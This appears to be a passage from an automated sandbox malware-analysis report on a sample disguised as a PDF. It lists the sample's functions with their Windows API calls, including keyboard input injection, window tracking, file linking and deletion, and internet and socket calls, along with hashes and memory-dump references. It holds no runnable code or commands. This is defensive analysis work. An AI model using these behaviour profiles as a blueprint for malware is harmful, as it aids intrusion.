                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                    • String ID:
                                                    • API String ID: 780911581-0
                                                    • Opcode ID: 9de1c83d26e827a1953faeec6d8d1fbc74fda21ec82304402bc27fa1ce564888
                                                    • Instruction ID: 339ad5db0db9b953a462aacbf78acb55809a8b609ee3fa3e57c1f59d0b3efb2a
                                                    • Opcode Fuzzy Hash: 9de1c83d26e827a1953faeec6d8d1fbc74fda21ec82304402bc27fa1ce564888
                                                    • Instruction Fuzzy Hash: FCA11775204B019FCB12EF14C491B1AB7E5BF89710F154959FA969B3A2CB30FD44CB86
                                                    Function 003791CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Variant$AllocClearCopyInitString
                                                    • String ID:
                                                    • API String ID: 2808897238-0
                                                    • Opcode ID: 15a885bbba0351e1a5badc4b544870b266c5849ce038362157d9b59ef6a2da3a
                                                    • Instruction ID: 4a570ee69782b057961b2c55c23706b030bc818a1af9cf0de45cd87d133fd1dc
                                                    • Opcode Fuzzy Hash: 15a885bbba0351e1a5badc4b544870b266c5849ce038362157d9b59ef6a2da3a
                                                    • Instruction Fuzzy Hash: 42518334604706DBEB36AF669491B2AB3E9EF45310F20C91FE54ECB6E1DB7898408701
                                                    Function 0036365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                    • String ID:
                                                    • API String ID: 3877424927-0
                                                    • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                    • Instruction ID: 32a641b85f242b71eb6f3d61dd9a13891fec1dc133d2cd4f4cc74a5dbc0e00d3
                                                    • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                    • Instruction Fuzzy Hash: 6B51C7B0A00305ABDB268F69C8856AE7BB5EF40320F25C72DF835976D8D7719F548B50
                                                    Function 003AC4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowRect.USER32(00C76F78,?), ref: 003AC544
                                                    • ScreenToClient.USER32(?,00000002), ref: 003AC574
                                                    • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 003AC5DA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientMoveRectScreen
                                                    • String ID:
                                                    • API String ID: 3880355969-0
                                                    • Opcode ID: f6a45d513cfc2280692e269188703caf8c3ed161bbe3b51f05c20d25a371094f
                                                    • Instruction ID: ae7704ff4e610db82a3968491d15c67685d99661c08a5059cfcc72c9a6aa7cdb
                                                    • Opcode Fuzzy Hash: f6a45d513cfc2280692e269188703caf8c3ed161bbe3b51f05c20d25a371094f
                                                    • Instruction Fuzzy Hash: 8A517E75910208EFCF12DF68C980AAE7BB5FF56320F159669F8659B2A0D730ED41CB90
                                                    Function 0037C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0037C462
                                                    • __itow.LIBCMT ref: 0037C49C
                                                      • Part of subcall function 0037C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0037C753
                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0037C505
                                                    • __itow.LIBCMT ref: 0037C55A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$__itow
                                                    • String ID:
                                                    • API String ID: 3379773720-0
                                                    • Opcode ID: 669d506c3132d50351f5a66eb57ab682d6a48739b45a81e9c68c01811ba85304
                                                    • Instruction ID: 255e7794ac7b25863b6ae40bf7ea21bd0f56e8b6f717e3212fdbd06700b92351
                                                    • Opcode Fuzzy Hash: 669d506c3132d50351f5a66eb57ab682d6a48739b45a81e9c68c01811ba85304
                                                    • Instruction Fuzzy Hash: 6641A671A00208AFDF23DF55C851FEE7BB9AF49710F005019FA09AB192DB75AA45CB91
                                                    Function 0038390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00383966
                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00383982
                                                    • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 003839EF
                                                    • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00383A4D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: d1da96c0a023d9aaccc0e14fc58c702300099a7a726ba78335b0e3f3d70510b5
                                                    • Instruction ID: a457334c801127a980f3d3c8ef0624527be43fd4a298193a39f596ceb2089a20
                                                    • Opcode Fuzzy Hash: d1da96c0a023d9aaccc0e14fc58c702300099a7a726ba78335b0e3f3d70510b5
                                                    • Instruction Fuzzy Hash: 35411870A04348AEEF37AB64C805BFEBBB9AB55710F04019AF4C1963C1C7B89E85D765
                                                    Function 0038E698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0038E742
                                                    • GetLastError.KERNEL32(?,00000000), ref: 0038E768
                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0038E78D
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0038E7B9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                    • String ID:
                                                    • API String ID: 3321077145-0
                                                    • Opcode ID: 47a6502885718a7e7e50abcbb2d41a41be4516d054ff56f446c9b6147b3c25a1
                                                    • Instruction ID: 2ff098c2a796eee4ca73aa37b4c36312a3d35776551f50e8bec26eef5fec9659
                                                    • Opcode Fuzzy Hash: 47a6502885718a7e7e50abcbb2d41a41be4516d054ff56f446c9b6147b3c25a1
                                                    • Instruction Fuzzy Hash: 494102396006109FCB12AF55C444A4EBBE5BF9A720B198499F946AF3B2CB74FD008B91
                                                    Function 003AB544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003AB5D1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    • Opcode ID: aa7753eb7c322f31db9d0e6773e500dcee93e59ed5e3179a3838e3d2fc431b17
                                                    • Instruction ID: f32c62ff7b14702936334e142a8a837137ffb0584581416bc67c9f5d20c38a3d
                                                    • Opcode Fuzzy Hash: aa7753eb7c322f31db9d0e6773e500dcee93e59ed5e3179a3838e3d2fc431b17
                                                    • Instruction Fuzzy Hash: 3131E034A00204BFEF268F18CC89FA8BB68EB07350F554611FA51E65F3C734A9508B51
                                                    Function 003AD7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ClientToScreen.USER32(?,?), ref: 003AD807
                                                    • GetWindowRect.USER32(?,?), ref: 003AD87D
                                                    • PtInRect.USER32(?,?,003AED5A), ref: 003AD88D
                                                    • MessageBeep.USER32(00000000), ref: 003AD8FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                    • String ID:
                                                    • API String ID: 1352109105-0
                                                    • Opcode ID: 453efb57f661d07c6bfbdaf7bfb67c24c9c2d856c80b1c567add0f0b4200afac
                                                    • Instruction ID: afec7bab69813dc1888a5163318aca7911a751a74dad17672e2630f3772166d6
                                                    • Opcode Fuzzy Hash: 453efb57f661d07c6bfbdaf7bfb67c24c9c2d856c80b1c567add0f0b4200afac
                                                    • Instruction Fuzzy Hash: A3418970A00218DFCB12DF58D884BA9BBF9FF4A311F1981A9E816DF660D739E941CB40
                                                    Function 00383A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00383AB8
                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00383AD4
                                                    • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00383B34
                                                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00383B92
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: f91f734a9fca7d7df07e53a7658b529e37e3602247ce599cd9630ad9430f91f5
                                                    • Instruction ID: 58d410d1e4e4de7fe155e829d406c92d0e27cc837bfcfed8a480d8010d1d7753
                                                    • Opcode Fuzzy Hash: f91f734a9fca7d7df07e53a7658b529e37e3602247ce599cd9630ad9430f91f5
                                                    • Instruction Fuzzy Hash: 5E3144B0A04348AEEF23AB64C819BFEBBAA9F45710F05019AE481973D1C7749F45C765
                                                    Function 00374004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00374038
                                                    • __isleadbyte_l.LIBCMT ref: 00374066
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00374094
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 003740CA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                    • String ID:
                                                    • API String ID: 3058430110-0
                                                    • Opcode ID: 5d95adcd3ad4e1aa627942444058f17e0e0fa63fa6ba410560c48279f9a9b949
                                                    • Instruction ID: b3a3c989ea5b68f33b627af0a225b4196c5cf56a8895dafd827e478d4d1e38d3
                                                    • Opcode Fuzzy Hash: 5d95adcd3ad4e1aa627942444058f17e0e0fa63fa6ba410560c48279f9a9b949
                                                    • Instruction Fuzzy Hash: 7F31B231600216AFDB339F74C845B7ABBA9BF40310F16C428E6698B190E735E890DB90
                                                    Function 003A7CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetForegroundWindow.USER32 ref: 003A7CB9
                                                      • Part of subcall function 00385F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00385F6F
                                                      • Part of subcall function 00385F55: GetCurrentThreadId.KERNEL32 ref: 00385F76
                                                      • Part of subcall function 00385F55: AttachThreadInput.USER32(00000000,?,0038781F), ref: 00385F7D
                                                    • GetCaretPos.USER32(?), ref: 003A7CCA
                                                    • ClientToScreen.USER32(00000000,?), ref: 003A7D03
                                                    • GetForegroundWindow.USER32 ref: 003A7D09
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                    • String ID:
                                                    • API String ID: 2759813231-0
                                                    • Opcode ID: 11bca549912d147575e2566d826543f650173e1f0df349fa1ec6b650cb880bf0
                                                    • Instruction ID: 78e49cc4643def858039ca1dd4bfb63128408b1c039cb26ed58e75e8f18e5ed4
                                                    • Opcode Fuzzy Hash: 11bca549912d147575e2566d826543f650173e1f0df349fa1ec6b650cb880bf0
                                                    • Instruction Fuzzy Hash: 8C311E71900108AFDB01EFA9CC85DEFBBFDEF55314B118466F915E7221DA319E058BA0
                                                    Function 003AF1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                                    • GetCursorPos.USER32(?), ref: 003AF211
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,003BE4C0,?,?,?,?,?), ref: 003AF226
                                                    • GetCursorPos.USER32(?), ref: 003AF270
                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,003BE4C0,?,?,?), ref: 003AF2A6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                    • String ID:
                                                    • API String ID: 2864067406-0
                                                    • Opcode ID: 8cf7c9beec4a4c006225056cf69ec14a3f639d7253ef59901ac3c939a6dc1174
                                                    • Instruction ID: a2dcfe44b0f796414d48b1e1fe28469362e19f7c3dc0cb7912966ba1525c5c64
                                                    • Opcode Fuzzy Hash: 8cf7c9beec4a4c006225056cf69ec14a3f639d7253ef59901ac3c939a6dc1174
                                                    • Instruction Fuzzy Hash: A021803D500018AFCB169F94CC98EFA7BB9EF4A710F058869F9099B2A1D3319951DB50
                                                    Function 0039431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00394358
                                                      • Part of subcall function 003943E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00394401
                                                      • Part of subcall function 003943E2: InternetCloseHandle.WININET(00000000), ref: 0039449E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Internet$CloseConnectHandleOpen
                                                    • String ID:
                                                    • API String ID: 1463438336-0
                                                    • Opcode ID: 9f498419fadbeab6e35b0a607002c3e09f79eda4719a60f294164a3bd377508c
                                                    • Instruction ID: 7cb79759bf4b9686747e53ff8a06b8daddb32e7581e94d8bc6a02c4ccb94307e
                                                    • Opcode Fuzzy Hash: 9f498419fadbeab6e35b0a607002c3e09f79eda4719a60f294164a3bd377508c
                                                    • Instruction Fuzzy Hash: 5321A17A200605BBEF179F709C40FBBB7ADFF44711F14401ABA15D6A50DB71A8329B90
                                                    Function 003A8A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 003A8AA6
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003A8AC0
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003A8ACE
                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 003A8ADC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$AttributesLayered
                                                    • String ID:
                                                    • API String ID: 2169480361-0
                                                    • Opcode ID: 58c7a394a7cca4f6b7565936950423672e5ac953002640753b2f0ba806cc4a26
                                                    • Instruction ID: 6af0b40dfa29a87de327b954c614048cb55a367598234e198d102dacf245311b
                                                    • Opcode Fuzzy Hash: 58c7a394a7cca4f6b7565936950423672e5ac953002640753b2f0ba806cc4a26
                                                    • Instruction Fuzzy Hash: EA118E31205511AFD706AB18CC05FBA779DEF86321F144519F916DB2E2CFB0BD118794
                                                    Function 00398A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00398AE0
                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00398AF2
                                                    • accept.WSOCK32(00000000,00000000,00000000), ref: 00398AFF
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00398B16
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastacceptselect
                                                    • String ID:
                                                    • API String ID: 385091864-0
                                                    • Opcode ID: 68dfeff96268988cb657a1680633054796856cd6ea4db1a6994c2a9135eb29b4
                                                    • Instruction ID: 0785721bb65bd64c30ae21b619b3872e7c230ff923aa4cd99982a26adf16308a
                                                    • Opcode Fuzzy Hash: 68dfeff96268988cb657a1680633054796856cd6ea4db1a6994c2a9135eb29b4
                                                    • Instruction Fuzzy Hash: B5217871A001249FC7129F69CC85E9EBBFCEF4A350F04416AF84ADB251DB74DA458F90
                                                    Function 00380AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00381E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00380ABB,?,?,?,0038187A,00000000,000000EF,00000119,?,?), ref: 00381E77
                                                      • Part of subcall function 00381E68: lstrcpyW.KERNEL32(00000000,?,?,00380ABB,?,?,?,0038187A,00000000,000000EF,00000119,?,?,00000000), ref: 00381E9D
                                                      • Part of subcall function 00381E68: lstrcmpiW.KERNEL32(00000000,?,00380ABB,?,?,?,0038187A,00000000,000000EF,00000119,?,?), ref: 00381ECE
                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0038187A,00000000,000000EF,00000119,?,?,00000000), ref: 00380AD4
                                                    • lstrcpyW.KERNEL32(00000000,?,?,0038187A,00000000,000000EF,00000119,?,?,00000000), ref: 00380AFA
                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,0038187A,00000000,000000EF,00000119,?,?,00000000), ref: 00380B2E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
